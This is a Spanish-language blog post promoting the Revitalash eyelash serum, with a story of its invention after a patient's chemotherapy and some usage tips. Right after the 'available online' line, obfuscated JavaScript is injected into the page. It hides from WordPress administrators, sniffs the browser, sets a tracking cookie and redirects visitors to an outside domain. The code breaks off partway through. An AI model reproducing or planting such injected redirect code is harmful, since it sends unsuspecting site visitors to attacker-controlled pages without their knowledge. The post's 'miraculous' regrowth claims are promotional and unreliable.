Aquí os traigo este revolucionario producto que ha ayudado a muchas personas que habían perdido sus pestañas, a recuperarlas de forma milagrosa.

Todo comenzó, cuando el Dr. Michael Brinkenhoff buscaba una regalo muy especial para su esposa, quien se estaba recuperando de una metástasis por cáncer de seno. Había sido sometida a intensivas quimioterapias lo que generó el debilitamiento y posterior pérdida de sus pestañas. Después de extensivas investigaciones, el Dr. Brinkenhoff, junto a un talentoso equipo de químicos del sector cosmético, creó un producto que realmente devolvió la vitalidad a las pestañas de su esposa. Revitalash fue el nombre perfecto para esta maravillosa creación.

Este producto es espectacular, y gracias al conjunto de componentes que contiene, da lugar a la aparición de pestañas más bellas y naturales.

Está recomendado para utilizar por la noche, y habiendo limpiado bien los ojos del maquillaje. Sin embargo, si lo utilizas por la mañana, por favor, sigue las instrucciones del producto que encontrarás dentro de la caja y espera como mínimo 5 minutos antes de empezar a utilizar el resto de tus productos faciales habituales.

Estoy segura de que si lo probáis os va a encantar y no habréis visto otro producto igual. 🙂

Producto disponible online var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone